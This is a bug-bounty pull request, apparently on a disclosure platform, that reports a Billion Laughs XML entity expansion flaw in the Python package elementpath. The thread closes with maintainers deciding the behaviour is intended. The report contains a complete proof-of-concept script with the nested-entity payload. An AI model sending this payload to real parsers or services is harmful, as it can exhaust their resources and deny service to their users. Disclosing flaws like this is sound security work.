### PR TITLE
XML Entity Expansion in elementpath

### PR DESCRIPTION
**Pull request by m0hanlal**
## ✍️ Description

`elementpath` is vulnerable to `XML Entity Expansion`.
This package allows for the processing of malicious entities, which result in DoS(Billion Laughs Attack).

## 🕵️‍♂️ Proof of Concept

1. Create the following PoC file:

```
// poc.py
import elementpath
from xml.etree import ElementTree
doc = '''
<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
'''
root = ElementTree.XML(doc)
print(elementpath.select(root, '/lolz/*'))
```

2. Execute the following commands in another terminal:

```bash
pip install elementpath   # Install affected module
python poc.py             #  Run the PoC
```

## 💥 Impact

Denial of Service (DoS)

## ✅ Checklist

**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

File: bounties/pip/elementpath/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,54 @@
...
+        "URL": "https://pypi.org/project/elementpath/",
+        "Downloads": "601,388"
+    },
+    "CWEs": [
+        {
+            "ID": "CWE-776",
+            "Description": "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')"
+        }
+    ],
+    "CVSS":
```
Comment (JamieSlome) [inline bounties/pip/elementpath/1/vulnerability.json:22]: Be careful - it seems like you have missed an opening `{`.

Comment (m0hanlal) [reply bounties/pip/elementpath/1/vulnerability.json:22]: Oops, thanks for the update. Updated.

**Comment by 418raj** [comment]
@m0hanlal were you able to escalate this to SSRF or data exfil? At the moment I'm not sure if this could be intentional, since as I understand it, the module's purpose is to evaluate Xpath expressions

**Comment by m0hanlal** [comment]
The module is not allowing to perform data exfiltration or SSRF, but it attempts to parse the billion laugh attack payload which results in DoS.

**Comment by 418raj** [comment]
Ah right thanks for confirming @m0hanlal. In this case we're going to close this disclosure, since it could be argued to be intended functionality, since the library is meant to evaluate XPath selectors, so it would expand/parse whatever it gets given as input. Cheers 👍

**Pull request closed without merging**